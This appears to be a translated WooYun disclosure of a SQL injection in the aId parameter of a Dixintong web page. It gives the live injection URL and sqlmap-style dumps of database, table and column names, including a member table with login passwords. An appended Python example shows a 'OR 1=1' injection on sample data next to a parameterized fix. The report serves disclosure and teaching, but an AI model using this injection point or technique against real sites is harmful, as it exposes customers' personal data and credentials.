Vulnerability summary

Defect ID: wooyun-2014-067877

Title: SQL injection on the Dixintong (迪信通) official website

Vendor: Dixintong (迪信通)

Author: jaffer

Submitted: 2014-07-11 12:44

Fix time: 2014-10-09 12:46

Disclosed: 2014-10-09 12:46

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-07-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-10-09: The vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

Issue 67 of Baidu Baijia (yesterday) debated whether Dixintong's transformation has succeeded. Well, the company has only just gone public, and it already has a hole this big.

Detailed description:

Injection point:

http://www.dixintong.com/activityshow.aspx?aId=660


database:

available databases [9]:
[*] crm
[*] dixintong
[*] master
[*] model
[*] msdb
[*] official
[*] tempdb
[*] wxcrm
[*] xnyycrm


A look at a few tables makes it clear.

Database: dixintong
[50 tables]
+----------------------------+
| dbo.Account |
| dbo.AccountAddr |
| dbo.AccountBasics |
| dbo.AccountCash |
| dbo.AccountFavor |
| dbo.AccountMess |
| dbo.AccountMessItem |
| dbo.AccountSafe |
| dbo.AccountSubscribe |
| dbo.DictArea1 |
| dbo.DictArea2 |
| dbo.DictArea3 |
| dbo.DictCateX |
| dbo.DictCourse |
| dbo.Product |
| dbo.ProductAssess |
| dbo.ProductAssrep |
| dbo.ProductAttrItem |
| dbo.ProductFlag |
| dbo.ProductImage |
| dbo.ProductMobile |
| dbo.ProductMobileRatio |
| dbo.ProductNote |
| dbo.ProductNoteTemp |
| dbo.ProductPrice |
| dbo.ProductStatus |
| dbo.ProductSuburb |
| dbo.ProductTemp |
| dbo.ProductTempItem |
| dbo.SaleOrder |
| dbo.SaleOrderItem |
| dbo.SaleOrderShare |
| dbo.SaleOrderStatus |
| dbo.Staff |
| dbo.SysChannel |
| dbo.SysMail |
| dbo.SysMailTemp |
| dbo.SysPower |
| dbo.SysRole |
| dbo.SysRolePower |
| dbo.SysStatistics |
| dbo.SysUser |
| dbo.SysUserRole |
| dbo.V_AccountFavor |
| dbo.V_AccountMess |
| dbo.V_PersonlAccountReport |
| dbo.V_Product |
| dbo.V_ProductPrice |
| dbo.V_SaleOrder |
| dbo.V_SaleOrderItemReport |
+----------------------------+


Database: dixintong
Table: dbo.Staff
[7 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Area | nvarchar |
| Company | nvarchar |
| CreateTime | datetime |
| SoreName | nvarchar |
| StaffCode | nvarchar |
| StaffName | nvarchar |
| SysNo | int |
+------------+----------+


Database: crm
[59 tables]
+----------------------------+
| dbo.AdminNav |
| dbo.Article |
| dbo.ArticleClass |
| dbo.BrandInfo |
| dbo.BugerInfo |
| dbo.Company |
| dbo.CompanyProduct |
| dbo.Dispose |
| dbo.EOrderMem |
| dbo.HistoryCompanyProduct |
| dbo.HistoryProduct |
| dbo.ProCPU |
| dbo.ProColor |
| dbo.ProDB |
| dbo.ProDjms |
| dbo.ProFbl |
| dbo.ProMemory |
| dbo.ProOperator |
| dbo.ProPlatform |
| dbo.ProPmcc |
| dbo.ProPmcz |
| dbo.ProSxtpx |
| dbo.ProSystem |
| dbo.ProTypeInfo |
| dbo.ProWlpl |
| dbo.ProWlzs |
| dbo.ProXsmd |
| dbo.Product |
| dbo.ProductClass |
| dbo.Reservation |
| dbo.Role |
| dbo.SysUser |
| dbo.SystemLog |
| dbo.View_Article |
| dbo.View_CompanyProduct |
| dbo.View_Orders |
| dbo.View_Product |
| dbo.View_QuestionAndAnswer |
| dbo.View_contractProduct |
| dbo.View_mdztorder |
| dbo.View_questionnaire |
| dbo.activity |
| dbo.answer |
| dbo.comtowxgroups |
| dbo.contractProduct |
| dbo.greentravel |
| dbo.mdztorders |
| dbo.member |
| dbo.message |
| dbo.mount |
| dbo.orders |
| dbo.orderstate |
| dbo.question |
| dbo.questionnaire |
| dbo.sqlmapoutput |
| dbo.staffinfo |
| dbo.storeType |
| dbo.storefront |
| dbo.wxhuodong |
+----------------------------+


User information table

Database: crm
Table: dbo.member
[22 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| address | varchar |
| addtime | datetime |
| area | varchar |
| city | varchar |
| Email | varchar |
| Id | int |
| integral | int |
| IsOldmem | int |
| isOpen | int |
| lastLogIp | varchar |
| lasttime | datetime |
| loginName | varchar |
| loginPwd | varchar |
| logNum | int |
| memberCode | varchar |
| mlevel | varchar |
| nickname | varchar |
| productPicture | varchar |
| province | varchar |
| QQ | varchar |
| tel | varchar |
| weixin | varchar |
+----------------+----------+


Proof of vulnerability:

Have a look at the tables above.
All of the information is exposed.
Fix it quickly. I recommend a penetration test of the site.
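As an added example that is not part of the original report, here is a minimal model of the aId lookup behind activityshow.aspx: the string-built query that makes the parameter injectable, beside the type-checked, parameterized version that closes it. The real endpoint runs ASP.NET against SQL Server; Python with an in-memory SQLite table (constructed sample rows) stands in for it here, and the table and column names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for whatever backs activityshow.aspx;
# the table name "activity" and its columns are assumptions, not from the report.
SAMPLE_ROWS = [(660, "Summer promotion"), (661, "Trade-in event"), (662, "Internal test")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the site's SQL Server database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activity (aId INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO activity VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, a_id: str) -> list:
    """The injectable pattern: the raw query-string value is pasted into the SQL,
    so whatever the client sends becomes part of the WHERE clause."""
    sql = "SELECT aId, title FROM activity WHERE aId = " + a_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn: sqlite3.Connection, a_id: str) -> list:
    """The fix: enforce the type aId is meant to have (a positive integer) and
    pass it as a bound parameter, so the value can never be parsed as SQL."""
    if not (a_id.isascii() and a_id.isdigit()):
        raise ValueError("aId must be a positive integer")
    sql = "SELECT aId, title FROM activity WHERE aId = ?"
    return conn.execute(sql, (int(a_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "660"))         # one row, as the page intends
    print(vulnerable_lookup(db, "660 OR 1=1"))  # every row: the condition was rewritten
    print(hardened_lookup(db, "660"))           # one row
    try:
        hardened_lookup(db, "660 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)                 # the tampered value never reaches SQL
```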

Remediation:

Copyright notice: when reposting, credit the source as jaffer@乌云 (WooYun)


Vendor response

Vendor reply:

The vendor could not be contacted, or the vendor actively declined.

